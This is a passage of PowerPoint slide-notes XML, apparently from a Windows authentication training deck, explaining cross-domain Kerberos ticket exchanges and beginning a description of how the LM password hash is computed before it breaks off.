              <a:buAutoNum type="arabicPeriod" startAt="4"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KDC in east.tailspintoys.com replies with KRB_TGS_REP. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The message includes:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A session key for the user to share with the server, encrypted with the session key the user shares with the KDC in east.tailspintoys.com.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A service ticket for admission to the server encrypted with the server key shared with the KDC.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="107152" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The service ticket includes:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A session key for the server to share with the user.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Authorization data copied from the user's TGT, plus data for the local domain, east.tailspintoys.com.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="107152" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The authorization data includes:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The SID for the user's account.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SIDs for groups in west.tailspintoys.com that include the user.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SIDs for universal groups that include either user or one of the user's groups in west.tailspintoys.com.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SIDs for groups in east.tailspintoys.com that include the user, one of the user's groups in west.tailspintoys.com, or one of their universal groups.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The user's Kerberos client sends the server a KRB_AP_REQ message. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The message includes:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The user principal name.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A service ticket to the server.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>An authenticator encrypted with the session key the user shares with the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="222241" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Note </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>If the user had asked for mutual authentication, then the server would reply with KRB_AP_REP. The reply message would include an authenticator encrypted with the session key the server shares with the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="222241" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="222241" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The same process takes place when a user logs on to a remote domain and needs a service ticket for the local workstation. The KDC in the logon domain issues a referral to the next realm between it and the workstation's realm, and so on, until the client can request a service ticket from the KDC in the workstation's realm.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe"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81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1216608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de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe"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82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1216608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de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe"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83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36920991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de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe"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84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7842944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85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8571614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86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6348817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87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22519929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pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The LM hash is computed as follows:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>[2]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The user's password is restricted to a maximum of fourteen characters.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>[Notes 1]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The user’s password is converted to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId6" tooltip="Uppercase"/>
              </a:rPr>
              <a:t>uppercase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The user's password is encoded in the System OEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId7" tooltip="Code page"/>
              </a:rPr>
              <a:t>Code page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>[3]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>This password is null-padded to 14 bytes.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>[4]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The “fixed-length” password is split into two seven-byte halves.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>These values are used to create two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId10" tooltip="Data Encryption Standard"/>
              </a:rPr>
              <a:t>DES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
